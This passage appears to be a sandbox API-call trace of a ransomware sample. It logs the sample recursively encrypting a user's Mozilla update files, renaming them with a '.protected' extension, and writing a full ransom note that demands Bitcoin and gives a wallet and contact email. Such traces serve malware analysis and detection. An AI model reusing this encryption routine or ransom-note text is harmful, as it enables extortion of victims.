HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.678] StrStrIW (lpFirst="active-update.xml", lpSrch=".protected") returned 0x0 [0086.678] lstrcmpW (lpString1="active-update.xml", lpString2="RESTORE_FILES.txt") returned -1 [0086.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".txt") returned 0x0 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".rar") returned 0x0 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".zip") returned 0x0 [0086.679] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x464, lpOverlapped=0x0) returned 1 [0086.690] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x464, lpOverlapped=0x0) returned 1 [0086.690] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.690] CloseHandle (hObject=0x150) returned 1 [0086.698] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.protected") returned 108 [0086.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.protected")) returned 1 [0086.699] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Windows") returned -1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Program Files") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Program Files (x86)") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="$Recycle.bin") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="System Volume Information") returned 1 [0086.699] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned 88 [0086.699] lstrcmpW (lpString1="updates", lpString2=".") returned 1 [0086.699] lstrcmpW (lpString1="updates", lpString2="..") returned 1 [0086.699] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*") returned 90 [0086.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.700] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.700] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\.") returned 90 [0086.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.700] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.700] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\..") returned 91 [0086.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.700] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.700] lstrcmpiW (lpString1="0", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1="0", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1="0", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1="0", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1="0", lpString2="System Volume Information") returned -1 [0086.701] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned 90 [0086.701] lstrcmpW (lpString1="0", lpString2=".") returned 1 [0086.701] lstrcmpW (lpString1="0", lpString2="..") returned 1 [0086.701] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*") returned 92 [0086.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.701] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.701] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\.") returned 92 [0086.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.701] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.702] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\..") returned 93 [0086.702] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.702] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Windows") returned -1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Program Files") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Program Files (x86)") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="$Recycle.bin") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="System Volume Information") returned 1 [0086.702] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.702] StrStrIW (lpFirst="update.mar", lpSrch=".protected") returned 0x0 [0086.702] lstrcmpW (lpString1="update.mar", lpString2="RESTORE_FILES.txt") returned 1 [0086.702] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.702] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW (lpFirst="update.mar", lpSrch=".txt") returned 0x0 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW (lpFirst="update.mar", lpSrch=".rar") returned 0x0 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW (lpFirst="update.mar", lpSrch=".zip") returned 0x0 [0086.703] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.710] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.710] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.711] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.711] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.715] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.715] CloseHandle (hObject=0x158) returned 1 [0086.715] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.protected") returned 111 [0086.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.protected")) returned 1 [0086.716] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Windows") returned -1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Program Files") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Program Files (x86)") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="$Recycle.bin") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="System Volume Information") returned 1 [0086.716] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.716] StrStrIW (lpFirst="update.status", lpSrch=".protected") returned 0x0 [0086.716] lstrcmpW (lpString1="update.status", lpString2="RESTORE_FILES.txt") returned 1 [0086.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".txt") returned 0x0 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".rar") returned 0x0 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".zip") returned 0x0 [0086.718] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xc, lpOverlapped=0x0) returned 1 [0086.719] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xc, lpOverlapped=0x0) returned 1 [0086.719] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.719] CloseHandle (hObject=0x158) returned 1 [0086.719] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.protected") returned 114 [0086.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.protected")) returned 1 [0086.720] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.720] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.721] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\RESTORE_FILES.txt") returned 108 [0086.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.723] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.723] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.724] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.724] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.724] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.724] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.724] CloseHandle (hObject=0x154) returned 1 [0086.724] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.724] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.724] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\RESTORE_FILES.txt") returned 106 [0086.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.725] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.725] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.726] lstrlenA 